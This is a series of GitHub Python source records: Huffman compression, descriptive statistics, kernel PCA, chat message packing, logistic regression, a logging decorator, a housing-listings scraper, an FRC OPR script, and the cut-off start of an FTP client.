int(self.BYTE_MAX_NUM * (freq / max_freq))\n scale_freq = 1 if not scale_freq and freq else scale_freq\n\n self.freqs[symbol] = scale_freq\n\n def _get_symbol_frequencies(self):\n for symbol in self.origin:\n self.freqs[symbol] += 1\n\n self._minimize_frequencies()\n\n def _initial_node_heap(self):\n self._heap = []\n for symbol, freq in enumerate(self.freqs):\n node = HuffmanNode(symbol, freq)\n heapq.heappush(self._heap, node)\n\n def _build_huffman_tree(self):\n self._initial_node_heap()\n\n while len(self._heap) > 1:\n node1 = heapq.heappop(self._heap)\n node2 = heapq.heappop(self._heap)\n\n new_node = HuffmanNode(symbol=None, freq=node1.freq + node2.freq)\n new_node.left, new_node.right = node1, node2\n node1.parent, node2.parent = new_node, new_node\n heapq.heappush(self._heap, new_node)\n\n self.huffman_tree = heapq.heappop(self._heap)\n del self._heap\n return self.huffman_tree\n\n def _build_coding_table(self, node, code_str=''):\n if node is None:\n return\n\n if node.symbol is not None:\n self.coding_table[node.symbol] = code_str\n self.reverse_table[code_str] = node.symbol\n\n self._build_coding_table(node.left, code_str + '0')\n self._build_coding_table(node.right, code_str + '1')\n\n def _pading_coding_str(self):\n pading_count = 8 - len(self.coding_str) % 8\n self.coding_str += '0' * pading_count\n state_str = '{:08b}'.format(pading_count)\n self.coding_str = state_str + self.coding_str\n\n def _prefix_coding_freqs(self):\n coding_freqs = []\n for freq in self.freqs:\n coding_freqs.append('{:08b}'.format(freq))\n coding_freqs = ''.join(coding_freqs)\n self.coding_str = coding_freqs + self.coding_str\n\n def _build_codeing_str(self):\n temp = []\n for symbol in self.origin:\n temp.append(self.coding_table[symbol])\n self.coding_str = ''.join(temp)\n\n self._pading_coding_str()\n self._prefix_coding_freqs()\n\n return self.coding_str\n\n def _get_compressed(self):\n assert (len(self.coding_str) % 8 == 0)\n\n b = bytearray()\n for index in range(0, len(self.coding_str), 8):\n code_num = int(self.coding_str[index:index + 8], 2)\n b.append(code_num)\n\n self.compressed = bytes(b)\n return self.compressed\n\n def _read_frequencies_from_compressed(self):\n coding_freqs = self.compressed[:self.BYTE_MAX_NUM + 1]\n for index, freq in enumerate(coding_freqs):\n self.freqs[index] = freq\n\n def _get_real_coding_from_compressed(self):\n pading_count = self.compressed[self.BYTE_MAX_NUM + 1]\n byte_coding_str = self.compressed[self.BYTE_MAX_NUM + 2:]\n coding_str = []\n for num in byte_coding_str:\n temp = bin(num)[2:]\n # 补足省略掉的前导零\n temp = '0' * (8 - len(temp)) + temp\n assert (len(temp) == 8)\n coding_str.append(temp)\n coding_str = ''.join(coding_str)\n assert (len(coding_str) % 8 == 0)\n real_coding_str = coding_str[:-pading_count]\n return real_coding_str\n\n def _decode_compressed(self):\n real_coding_str = self._get_real_coding_from_compressed()\n decode_content = []\n\n node = self.huffman_tree\n for state in real_coding_str:\n if state == '0':\n node = node.left\n elif state == '1':\n node = node.right\n\n if node.symbol is not None:\n assert (0 <= node.symbol <= self.BYTE_MAX_NUM)\n hex_str = hex(node.symbol)[2:]\n # fromhex方法将两个字符识别为一个16进制数\n # 所以单个数需要补零\n hex_str = '0' + hex_str if len(hex_str) == 1 else hex_str\n decode_content.append(hex_str)\n node = self.huffman_tree\n\n decode_content = ''.join(decode_content)\n return bytes.fromhex(decode_content)\n\n def clear(self):\n self.__init__()\n\n def encode(self, origin):\n self.clear()\n self.origin = origin\n 
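# --- Editor's illustrative sketch (not part of the record above) ---
# _pading_coding_str/_get_compressed above pack a '0'/'1' string into bytes:
# pad to a byte boundary, record the pad length in a leading byte, and strip
# that many bits on the way back out. A minimal round-trip of the same idea
# (the class always pads 1-8 bits; this sketch pads 0-7 -- the header byte
# disambiguates either way):

def pack_bits(bit_str):
    pad = (8 - len(bit_str) % 8) % 8
    full = '{:08b}'.format(pad) + bit_str + '0' * pad
    return bytes(int(full[i:i + 8], 2) for i in range(0, len(full), 8))

def unpack_bits(data):
    pad = data[0]
    bits = ''.join('{:08b}'.format(b) for b in data[1:])
    return bits[:len(bits) - pad] if pad else bits

for s in ('1', '10110', '10101010'):
    assert unpack_bits(pack_bits(s)) == s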
self._get_symbol_frequencies()\n self._build_huffman_tree()\n self._build_coding_table(self.huffman_tree)\n self._build_codeing_str()\n\n return self._get_compressed()\n\n def compresse(self, filename, output_filename=None):\n with open(filename, 'rb') as file:\n origin = file.read()\n\n compressed_content = self.encode(origin)\n if output_filename is None:\n output_filename = filename + '.hfm'\n with open(output_filename, 'wb') as file:\n file.write(compressed_content)\n\n return True\n\n def decode(self, compressed):\n self.clear()\n self.compressed = compressed\n self._read_frequencies_from_compressed()\n self._build_huffman_tree()\n return self._decode_compressed()\n\n def uncompresse(self, filename, output_filename=None):\n with open(filename, 'rb') as file:\n compressed = file.read()\n\n decode_content = self.decode(compressed)\n if output_filename is None:\n if filename.endswith('.hfm'):\n output_filename = filename[:-4]\n else:\n output_filename = filename + '.dhfm'\n\n with open(output_filename, 'wb') as file:\n file.write(decode_content)\n\n return True\n","repo_name":"runningabcd/Spider-Life","sub_path":"Algorithm/huffmanTree.py","file_name":"huffmanTree.py","file_ext":"py","file_size_in_byte":11052,"program_lang":"python","lang":"zh","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"26376973358","text":"import numpy as np\r\nimport matplotlib.pyplot as la\r\nfrom scipy import stats\r\n\r\n# function to calculate mode\r\ndef get_mode(list) :\r\n\tcount = 0\r\n\tnum = list[0]\r\n\tfor i in list :\r\n\t\tfreq = list.count(i)\r\n\t\tif freq>count :\r\n\t\t\tcount = freq\r\n\t\t\tnum = i\r\n\treturn num,count\r\n\r\n# array definition and its boxplot\r\nset = np.random.randint(0,101,1000)\r\n# set = np.append(set,[156,-65])\r\nfig = la.figure()\r\nla.boxplot(set)\r\nfig.savefig(\"box.png\")\r\n\r\n# sorting array\r\nsorted_data = np.sort(set).tolist()\r\n\r\n# stats using predefined functions\r\nmean_set = np.mean(set)\r\nmedian_set = np.median(set)\r\nmode_set = stats.mode(set)\r\nquantile1_set = np.percentile(set,25)\r\nquantile2_set = np.percentile(set,50)\r\nquantile3_set = np.percentile(set,75)\r\niqr_set = stats.iqr(set)\r\n\r\n\r\n# printing data of predefined functions\r\nprint(\"Predefined function\\n--------------------\\nMean: \",mean_set,\" ; Median: \",median_set,\" ; Mode: \",mode_set,\" ; 1st Quartile: \",quantile1_set,\" ; 2nd Quartile: \",quantile2_set,\" ; 3rd Quartile: \",quantile3_set,\" ; InterQuartileRange: \",iqr_set,'\\n')\r\n\r\n# calculating mean\r\nlent = len(set)\r\nsum = np.sum(set)\r\nmean = sum/lent\r\n\r\n# calculating mediant\r\nmedian = 0\r\nif (lent%2 == 0) :\r\n\tmedian = (sorted_data[(lent//2)-1] + sorted_data[lent//2])/2\r\nelse :\r\n\tmedian = sorted_data[(lent-1)//2]*1.0\r\n\r\n# calculating quartiles\r\nquantile1 = 0\r\nif (lent+1)%4 == 0 :\r\n\tquantile1 = sorted_data[((lent+1)//4)-1]*1.0\r\nelse :\r\n\tquantile1 = (sorted_data[((lent+1)//4)-1] + sorted_data[(lent+1)//4])/2\r\n\r\nquantile2 = median\r\n\r\nquantile3 = 0\r\nif (3*(lent+1))%4 == 0 :\r\n\tquantile3 = sorted_data[((3*(lent+1))//4)-1]*1.0\r\nelse :\r\n\tquantile3 = (sorted_data[((3*(lent+1))//4)-1] + sorted_data[(3*(lent+1))//4])/2\r\n\t\r\n\r\n# outliers\r\niqr = quantile3 - quantile1\r\nub = quantile3 + 1.5*iqr\r\nlb = quantile1 - 1.5*iqr\r\noutliers = []\r\n\r\nfor i in sorted_data :\r\n\tif iub :\r\n\t\toutliers.append(i)\r\n\telse :\r\n\t\tcontinue\r\n\r\n# calculating mode\r\nmode,count = get_mode(sorted_data)\r\n\r\n# printing calculated 
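# --- Editor's illustrative sketch (not part of the record above) ---
# The outlier test in the Box.py record above reads "if iub", which has
# clearly lost its comparison operators in extraction; from the fences
# computed just before it, it is presumably "if i < lb or i > ub". The
# 1.5*IQR fence rule it implements, in isolation:

def iqr_outliers(sorted_data, q1, q3):
    iqr = q3 - q1
    lb = q1 - 1.5 * iqr  # lower fence
    ub = q3 + 1.5 * iqr  # upper fence
    return [x for x in sorted_data if x < lb or x > ub]

assert iqr_outliers([1, 2, 3, 4, 100], 2, 4) == [100]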
data\r\nprint(\"Calculated\\n--------------------\\nMean: \",mean,\" ; Median: \",median,\" ; Mode: \",mode,\",count: \",count,\" ; 1st Quartile: \",quantile1,\" ; 2nd Quartile: \",quantile2,\" ; 3rd Quartile: \",quantile3,\" ; InterQuartileRange: \",iqr)\r\n\r\nprint(\"Outliers: \",outliers)","repo_name":"abhiisshheekk/data_analysis","sub_path":"Box.py","file_name":"Box.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73951027627","text":"import torch\nfrom torch import Tensor as T\n\nfrom .level import Level\nfrom ._kpca import _KPCA\nfrom kerch import utils\n\n\nclass KPCA(_KPCA, Level):\n r\"\"\"\n Kernel Principal Component Analysis.\n \"\"\"\n\n @utils.extend_docstring(_KPCA)\n @utils.extend_docstring(Level)\n @utils.kwargs_decorator({})\n def __init__(self, *args, **kwargs):\n super(KPCA, self).__init__(*args, **kwargs)\n\n def __str__(self):\n return \"KPCA with \" + Level.__str__(self)\n\n def reconstruct(self, x=None, representation=None):\n representation = utils.check_representation(representation, self._representation, self)\n if representation == 'primal':\n phi = self.phi(x)\n U = self.weight\n R = U @ U.T\n return phi @ R\n else:\n K = self.k(x)\n H = self.hidden\n R = H @ H.T\n return K @ R\n\n def _update_hidden_from_weight(self):\n self.hidden = self(representation='primal') @ torch.diag(1 / self.vals)\n","repo_name":"hdeplaen/kerch","sub_path":"kerch/rkm/kpca.py","file_name":"kpca.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"29823552002","text":"import json\nimport time\n\n\ndef pack(raw_message, send_from, chat_with, message_type):\n \"\"\"\n 打包消息,用于发送\n :param raw_message: 正文消息\n :param send_from: 发送者\n :param chat_with: 聊天对象\n :param message_type: 消息类型\n :param file_name: 文件名,如果不是���件类型,则为None\n \"\"\"\n message = {\n 'by': send_from,\n 'to': chat_with,\n 'type': message_type,\n 'time': time.time(),\n 'message': raw_message,\n } # 先把收集到的信息存储到字典里\n return (json.dumps(message) + '\\0').encode('utf-8') # 再用json打包\n\n\ndef unpack(json_message: bytes):\n \"\"\"\n 解包消息,用于接收JSON格式的消息\n 看不懂message字典对应的东西吗?message_types里面有。\n\n :param json_message: JSON消息\n :return: 返回的东西有很多,也有可能是报错\n ==================================================\n return返回值大全:\n JSON_MESSAGE_NOT_EOF: 消息不完整\n NOT_JSON_MESSAGE: 不是JSON格式的消息\n MANIFEST_NOT_JSON: 用户名单不是JSON格式\n UNKNOWN_MESSAGE_TYPE: 未知消息类型\n --------------------------------------------------\n FILE_SAVED: 文件保存成功\n <一个列表>: 这是用户名单,有用的\n \"\"\"\n try:\n message = json.loads(json_message)\n if isinstance(message, list):\n message = message[0]\n message = json.loads(message)\n except json.decoder.JSONDecodeError:\n return 'DO_NOT_PROCESS',\n except UnicodeDecodeError:\n return 'DO_NOT_PROCESS',\n\n if 'to' not in message or 'by' not in message or 'message' not in message:\n return None,\n if message['type'] == 'TEXT_MESSAGE' or \\\n message['type'] == 'COLOR_MESSAGE': # 如果是纯文本消息\n return message['type'], message['to'], message['by'], message['time'], message['message']\n elif message['type'] == 'USER_NAME' or \\\n message['type'] == 'REGISTER': # 如果是用户名称\n try:\n username = message['message']\n return message['type'], username\n except json.decoder.JSONDecodeError:\n return 'MANIFEST_NOT_JSON',\n elif message['type'] == 'COMMAND':\n return message['type'], message['by'], message['message']\n else:\n return 
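# --- Editor's illustrative sketch (not part of the record above) ---
# pack() in the server_operations record above terminates every JSON message
# with '\0' because TCP is a byte stream: one recv() may carry several
# messages or half of one. A matching receive loop, assuming the same '\0'
# framing, buffers bytes and yields one complete JSON document per delimiter:

import json

def iter_messages(recv_chunks):
    buf = b''
    for chunk in recv_chunks:  # e.g. iter(lambda: sock.recv(4096), b'')
        buf += chunk
        while b'\0' in buf:
            raw, buf = buf.split(b'\0', 1)
            yield json.loads(raw.decode('utf-8'))

chunks = [b'{"type": "TEXT_ME', b'SSAGE"}\0{"type": "COMMAND"}\0']
assert [m['type'] for m in iter_messages(chunks)] == ['TEXT_MESSAGE', 'COMMAND']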
'UNKNOWN_MESSAGE_TYPE',\n","repo_name":"ThirdBlood/Lhat-Server","sub_path":"server_operations.py","file_name":"server_operations.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34513505195","text":"import Functions\r\n\r\nclass tests:\r\n def __init__(self):\r\n self.__coord_x=0\r\n self.__coord_y=0\r\n self.__color=''\r\n \r\n def set_point1(self):\r\n points=[]\r\n point1=Functions.MyPoint(1,2,'red')\r\n point2=Functions.MyPoint(2,3,'blue')\r\n point3=Functions.MyPoint(1,2,'green')\r\n points.append(point1)\r\n points.append(point2)\r\n points.append(point3)\r\n return points\r\n\r\n def set_point2(self):\r\n points=[]\r\n point1=Functions.MyPoint(1,2,'red')\r\n point2=Functions.MyPoint(9,9,'red')\r\n point3=Functions.MyPoint(1,2,'green')\r\n points.append(point1)\r\n points.append(point2)\r\n points.append(point3)\r\n return points\r\n\r\n def set_point3(self):\r\n points=[]\r\n point1=Functions.MyPoint(1,2,'yellow')\r\n point2=Functions.MyPoint(2,3,'blue')\r\n point3=Functions.MyPoint(1,2,'magenta')\r\n points.append(point1)\r\n points.append(point2)\r\n points.append(point3)\r\n return points\r\n\r\n def get_all_points_test(self):\r\n self=tests.set_point1(self)\r\n assert Functions.PointRepository.get_all_points(self)==\"Point(1,2) of color red\\nPoint(2,3) of color blue\\nPoint(1,2) of color green\"\r\n \r\n def run_tests():\r\n self=[]\r\n tests.get_all_points_test(self)","repo_name":"IgnatiucMircea/Points","sub_path":"Tests.py","file_name":"Tests.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20301611050","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport sys\n\n# In[2]:\n\n\ndef sigmoid(z):\n return 1.0 / (1.0+np.exp(-1.0*z))\n\ndef gradient(x_data, y_data, w, lam):\n g = np.zeros(len(w))\n for i in range(len(x_data)):\n x = np.array(x_data[i],dtype=float)\n f = sigmoid(np.dot(w.T,x))\n g += (f - float(y_data[i]))*x\n g = g + 2*lam*w\n return g/len(x_data)\n\ndef Accuracy(x_data,y_data,w):\n count = 0\n for i in range(len(x_data)):\n f = sigmoid(np.dot(w.T,x_data[i]))\n if f > 0.5:\n if float(y_data[i])==1:\n count+=1\n else:\n if float(y_data[i])==0:\n count+=1\n return (1.0*count/len(y_data))\n\ndef logistic(x_data, y_data, eta, batch_size, epoch, lam):\n w = np.zeros(len(x_data[0]))\n train_size = len(x_data)\n iteration = int(train_size/batch_size)+1\n s_grad = np.ones(len(x_data[0]))/1000000000000000\n for time in range(epoch):\n for i in range(iteration):\n batch_sample_x = x_data[i*batch_size:min((i+1)*batch_size,train_size)]\n batch_sample_y = y_data[i*batch_size:min((i+1)*batch_size,train_size)]\n g = gradient(batch_sample_x,batch_sample_y,w, lam)\n s_grad += g**2\n ada = np.sqrt(s_grad)\n #ada = [1 if ele ==0 else ele for ele in ada]\n w = w - eta*g/ada\n #eta*=0.97\n if (time+1)%int(epoch/10) == 0:\n cost = np.sum([abs(sigmoid(np.dot(w.T,x_data[j]))-y_data[j]) for j in range(len(x_data))])\n print(\"Epoch %d/%d | Cost: %.2f | Accuracy: %.4f\" %(time+1,epoch,cost,Accuracy(x_data,y_data,w)))\n \n return w\n\ndef test_output(x_data,w):\n result = []\n for i in range(len(x_data)):\n id = str(i+1)\n err = sigmoid(np.dot(w.T,x_data[i]))\n if err > 0.5:\n result.append([id, 1])\n else:\n result.append([id, 0])\n return result\n\n\n# In[3]:\n\n\ntrain_data = pd.read_csv(sys.argv[1])\n\n\n# In[4]:\n\n\nY = 
train_data['income'].map({\" <=50K\":0,\" >50K\":1}).values\ntrain_data.drop('income',axis=1,inplace=True)\n\ntrain_data.age = train_data.age.astype(float)\ntrain_data.fnlwgt = train_data.fnlwgt.astype(float)\ntrain_data.education_num = train_data.education_num.astype(float)\ntrain_data.hours_per_week = train_data.hours_per_week.astype(float)\n\ntrain_data = pd.get_dummies(train_data, columns=[\n \"workclass\", \"education\", \"marital_status\", \"occupation\", \"relationship\",\n \"race\", \"sex\", \"native_country\",\n])\n\n\n# In[5]:\n\n\ndrop_out_list = [\"occupation_ ?\", \"workclass_ ?\",\n \n \"native_country_ ?\", \"native_country_ Cambodia\", \"native_country_ Canada\",\n \"native_country_ China\", \"native_country_ Columbia\", \"native_country_ Cuba\", \"native_country_ Dominican-Republic\",\n \"native_country_ Ecuador\", \"native_country_ El-Salvador\", \"native_country_ England\", \"native_country_ France\",\n \"native_country_ Germany\", \"native_country_ Greece\", \"native_country_ Guatemala\", \"native_country_ Haiti\",\n \"native_country_ Holand-Netherlands\",\"native_country_ Honduras\",\"native_country_ Hong\",\"native_country_ Hungary\",\n \"native_country_ India\",\"native_country_ Iran\",\"native_country_ Ireland\",\"native_country_ Italy\",\"native_country_ Jamaica\",\n \"native_country_ Japan\",\"native_country_ Laos\",\"native_country_ Mexico\",\"native_country_ Nicaragua\",\n \"native_country_ Outlying-US(Guam-USVI-etc)\",\"native_country_ Peru\",\"native_country_ Philippines\",\"native_country_ Poland\",\n \"native_country_ Portugal\",\"native_country_ Puerto-Rico\",\"native_country_ Scotland\",\"native_country_ South\",\n \"native_country_ Taiwan\",\"native_country_ Thailand\",\"native_country_ Trinadad&Tobago\",\"native_country_ United-States\",\n \"native_country_ Vietnam\",\"native_country_ Yugoslavia\",\n \n \"relationship_ Husband\",\"relationship_ Not-in-family\",\"relationship_ Other-relative\",\n \"relationship_ Own-child\",\"relationship_ Unmarried\", \"relationship_ Wife\",\n \n \"education_ 10th\",\"education_ 11th\", \"education_ 12th\", \"education_ 1st-4th\", \"education_ 5th-6th\", \n \"education_ 7th-8th\", \"education_ 9th\", \"education_ Assoc-acdm\", \"education_ Assoc-voc\", \n \"education_ Bachelors\", \"education_ Doctorate\", \"education_ HS-grad\", \"education_ Masters\", \n \"education_ Preschool\", \"education_ Prof-school\", \"education_ Some-college\",\n \n \"race_ Amer-Indian-Eskimo\", \"race_ Asian-Pac-Islander\", \"race_ Black\", \"race_ Other\", \"race_ White\"\n ]\ndf = pd.DataFrame(train_data)\ndf.drop(drop_out_list, axis=1, inplace=True,)\n\n\n# In[6]:\n\n\nscale = []\nfor col in df.columns:\n s = [col]\n maximun = max(df[col])\n minimum = min(df[col])\n if maximun != 1:\n m = df[col].mean()\n v = df[col].std()\n s.append(m)\n s.append(v)\n df[col] = (df[col]-m)/v\n #df[col] = (df[col]-minimum)/maximun-minimum\n #s.append(maximun)\n #s.append(minimum)\n scale.append(s)\n\nDataSet_X = df.values\nDataSet_Y = Y\n\n\n# In[7]:\n\n\nw = logistic(DataSet_X,DataSet_Y,0.01,512,200,0.00001)\n\n\n# In[8]:\n\n\n#input data\ntest_data = pd.read_csv(sys.argv[2])\ntest_data.age = test_data.age.astype(float)\ntest_data.fnlwgt = test_data.fnlwgt.astype(float)\ntest_data.education_num = test_data.education_num.astype(float)\ntest_data.hours_per_week = test_data.hours_per_week.astype(float)\ntest_data = pd.get_dummies(test_data, columns=[\n \"workclass\", \"marital_status\", \"occupation\", \"sex\"\n])\n\n# Get missing columns in the training 
test\nmissing_cols = set( train_data.columns ) - set( test_data.columns )\n# Add a missing column in test set with default value equal to 0\nfor c in missing_cols:\n test_data[c] = 0\n\ntest_df = pd.DataFrame(test_data)\ntest_df.drop(drop_out_list, axis=1, inplace=True,)\n# Ensure the order of column in the test set is in the same order than in train set\ntest_df = test_df[df.columns]\n\n\n# In[9]:\n\n\nfor s in scale:\n col = s[0]\n test_df[col] = (test_df[col]-s[1])/s[2]\ninput_x = []\nfor i in range(test_df.shape[0]):\n input_x.append(list(test_df.iloc[i,:]))\nr = test_output(input_x,w)\n\nexport_df = pd.DataFrame(r,columns=['id','label'])\nexport_df.to_csv(sys.argv[6],sep=',',encoding='utf-8',index=False)\n\n","repo_name":"huhuman/ML2018SPRING","sub_path":"hw2/hw2_logistic.py","file_name":"hw2_logistic.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22707130169","text":"# coding:utf8\nimport logging\nfrom functools import wraps\nfrom time import localtime, time, strftime, sleep\nfrom random import choice\n\n# 如何在类中定义装饰器\n\n''''''\n\n'''\n实例:\n实现一个能将函数调用信息记录到日志的装饰器:\n1.把每次函数的调用时间,执行时间,调用次数写入日志\n2.可以对被装饰函数分组,调用信息记录到不同日志\n3.动态修改参数,比如日志格式\n4.动态打开关闭日志输出功能\n'''\n'''\n为了让装饰器在使用上更加灵活,可以把类的实例方法作为装饰器,\n此时在包裹函数中就可以持有实例对象,便与修改属性和拓展功能\n'''\n\n\nclass CallingInfo(object):\n def __init__(self, name):\n log = logging.getLogger(name)\n log.setLevel(logging.INFO)\n fh = logging.FileHandler(name + '.log')\n log.addHandler(fh)\n log.info('start'.center(50, '.'))\n self.log = log\n self.formatter = '%(func)s -> [%(time)s - %(used)s - %(ncalls)s]'\n\n def info(self, func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n lt = localtime() # 表示函数的调用时间点\n t2 = time()\n res = func(*args, **kwargs)\n wrapper.ncalls += 1 # 表示函数调用次数\n used = time() - t2 # t3-t2 used时间\n info = {}\n info['func'] = func.__name__\n info['time'] = strftime('%x %X', lt)\n info['used'] = used\n info['ncalls'] = wrapper.ncalls\n msg = self.formatter % info\n self.log.info(msg)\n return res\n\n wrapper.ncalls = 0\n\n return wrapper\n\n def setFormatter(self, formatter):\n self.formatter = formatter\n\n def turnOn(self):\n self.log.setLevel(logging.INFO)\n\n def turnOff(self):\n self.log.setLevel(logging.WARN)\n\n\nif __name__ == '__main__':\n cinfo1 = CallingInfo('mylog1')\n cinfo2 = CallingInfo('mylog2')\n\n formatter = '%(func)s -> [%(time)s - %(ncalls)s]'\n cinfo1.setFormatter(formatter)\n cinfo2.turnOff()\n @cinfo1.info\n def f():\n print('in f')\n\n\n @cinfo1.info\n def g():\n print('in g')\n\n\n @cinfo2.info\n def h():\n print('in h')\n\n\n for _ in range(50):\n choice([f, g, h])()\n sleep(choice([0.5, 1, 1.5]))\n","repo_name":"zhwl934008411/Python-Advanced-Programing","sub_path":"index9/index9-5.py","file_name":"index9-5.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72429354986","text":"import requests, pprint, pandas\nfrom bs4 import BeautifulSoup\n\nss = requests.session()\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/80.0.3987.132 Safari/537.36'}\npages = 10 # 總頁數\ncurrent_page = 1\nfor m in range(pages):\n url = f'https://newhouse.591.com.tw/home/housing/search?rid=1&page={current_page + m}&sid='\n res = ss.get(url, headers=headers).json()\n\n for anyy in res['data']['items']:\n # pprint.pprint(anyy)\n # 
print(len(res['data']['items'])) #20筆\n\n # 把每筆物件的標籤整合為一個字串 不然印成csv會變多列\n tag_str=''\n for anyyy in anyy['tag']:\n tag_str += anyyy + ' '\n anyy['tag'] = tag_str\n\n # bid = 細項網址\n anyy['bid'] = 'https://newhouse.591.com.tw/home/housing/detail?hid=' + str(anyy['hid'])\n\n # 去除不重要的欄位\n if 'video_pic' in anyy:\n del anyy['video_pic']\n if 'event_show_url' in anyy:\n del anyy['event_show_url']\n if 'event_click_url' in anyy:\n del anyy['event_click_url']\n if 'event_show' in anyy:\n del anyy['event_show']\n if 'event_click' in anyy:\n del anyy['event_click']\n if 'cover' in anyy:\n del anyy['cover']\n if 'native_orderno' in anyy:\n del anyy['native_orderno']\n if 'is_video' in anyy:\n del anyy['is_video']\n if 'isvip' in anyy:\n del anyy['isvip']\n\n pprint.pprint(anyy)\n\n # 建立 dataframe\n tt = pandas.DataFrame.from_dict(anyy,orient='index').T\n\n # 第一頁第一筆時重開檔案,其它時候 append 上去\n if anyy == res['data']['items'][0] and m == 0:\n tt.to_csv('591.csv', mode='w', encoding='utf-8-sig', index=False)\n else:\n tt.to_csv('591.csv', mode='a', encoding='utf-8-sig', header=False, index=False)\n","repo_name":"balao1312/MyWork","sub_path":"littlework/591_scraing.py","file_name":"591_scraing.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4904879572","text":"import re\nfrom commonUtils import getSentimentDictionary,getStopWordList,processTweet,replaceTwoOrMore\n\n#start getfeatureVector\ndef getFeatureVector(tweet):\n featureVector = []\n processed_tweet = processTweet(tweet);\n #split tweet into words\n words = processed_tweet.split()\n for w in words:\n #replace two or more with two occurrences\n w = replaceTwoOrMore(w)\n #strip punctuation\n w = w.strip('\\'\"?,.')\n #check if the word stats with an alphabet\n val = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", w)\n #ignore if it is a stop word\n stopWordsList = set(getStopWordList())\n if(w in stopWordsList or val is None):\n continue\n else:\n featureVector.append(w)\n return featureVector\n#end\n\n\n\ndef getSentiment(feature_vector):\n pos_neg_count = 0;\n sentiment_dictionary = getSentimentDictionary()\n for word in feature_vector:\n pos_neg_count += sentiment_dictionary.get(word,0); \n sentiment = 'neutral'; \n if(pos_neg_count > 0):\n sentiment = 'positive'\n elif(pos_neg_count < 0):\n sentiment = 'negative'\n return sentiment \n\n#start extract_features\ndef extract_word_features(tweet):\n return dict([(word, True) for word in tweet])\n#end\n\n","repo_name":"MukulLatiyan/sentiment-analysis-data","sub_path":"sentimentUtils.py","file_name":"sentimentUtils.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40735539845","text":"import statistics as stat\r\nimport gen\r\ntba = gen.setup()\r\n\r\n#These control which year and district data is pulled for\r\nYEAR = 2018\r\nDISTRICT = 'chs'\r\n\r\n#Structures to hold commonly used data\r\neventData = {}\r\nteamsList = []\r\n\r\n#Fetch district teams and events\r\ndistTeams = tba.district_teams(str(YEAR) + DISTRICT, False)\r\ndistEvents = tba.district_events(str(YEAR) + DISTRICT)\r\n\r\n#Store data on common district events first\r\nfor event in distEvents:\r\n eventData[event['key']] = tba.event_oprs(event['key'])\r\n\r\nteamCount = 0\r\nfor team in distTeams:\r\n teamCount += 1\r\n gen.progressBar(teamCount, len(distTeams))\r\n oprs = []\r\n\r\n events = tba.team_events(team['key'], YEAR)\r\n \r\n for 
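# --- Editor's illustrative sketch (not part of the record above) ---
# The 591 scraper above rewrites its CSV (mode 'w', with header) only for the
# very first record of the first page and appends header-less rows after
# that, so the file ends up with exactly one header. The same pattern
# factored out; the path and row dicts here are placeholders:

import pandas

def append_row(path, row, first):
    frame = pandas.DataFrame([row])
    if first:
        frame.to_csv(path, mode='w', index=False)  # fresh file + header
    else:
        frame.to_csv(path, mode='a', header=False, index=False)

rows = [{'hid': 1, 'tag': 'a b'}, {'hid': 2, 'tag': 'c'}]
for i, row in enumerate(rows):
    append_row('listings.csv', row, first=(i == 0))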
event in events:\r\n \r\n #Only run on official events, ignores preseason, offseason, and unlabled\r\n #Try / Except to handle borked events\r\n #Tries to load data from eventData first, only hits TBA if needed\r\n #Stores team OPR data for later use.\r\n if event['event_type'] in range(0,10):\r\n try:\r\n if event['key'] in eventData.keys():\r\n oprs.append(eventData[event['key']]['oprs'][team['key']])\r\n else:\r\n eventData[event['key']] = tba.event_oprs(event['key'])\r\n oprs.append(eventData[event['key']]['oprs'][team['key']])\r\n #Print errors, typically this has just been teams winning awards when\r\n #they didn't compete (ie Dean's list, WFA, etc.)\r\n except Exception as e:\r\n print(e)\r\n #Handle teams that we didn't get data for, zero is an OK value for them.\r\n if len(oprs) is 0:\r\n maxOPR = 0\r\n avgOPR = 0\r\n else:\r\n maxOPR = max(oprs)\r\n avgOPR = stat.mean(oprs)\r\n \r\n #Store team data in a dict, append that dict to the list of teams \r\n teamData = {'num': team['team_number'], 'maxOPR': maxOPR, 'avgOPR': avgOPR, 'city': team['city'], 'state': team['state_prov'], 'rookie_year': team['rookie_year']}\r\n teamsList.append(teamData)\r\n\r\ngen.listOfDictToCSV(DISTRICT + str(YEAR) + \"OPRs\", teamsList)","repo_name":"PChild/frc-data-scripts","sub_path":"districtOPRs.py","file_name":"districtOPRs.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70240348268","text":"#-*- coding:utf-8 -*-\nimport socket\nimport os,sys\nfrom conf import configure as conf\nimport json\nimport hashlib\nclass Myclient(object):\n #客户端类\n\n def __init__(self,ip_port,name):\n self.func_dict = {\n 'help': 'help',\n 'get': 'get',\n 'put': 'put',\n 'exit': 'exit',\n 'ls': 'ls',\n 'cd': 'cd',\n 'del': 'del'\n }\n #定义socket的信息,但是不连接。。。要验证登录再连接\n self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.ip_port = ip_port\n self.exit_flag = False\n self.name = name\n # if 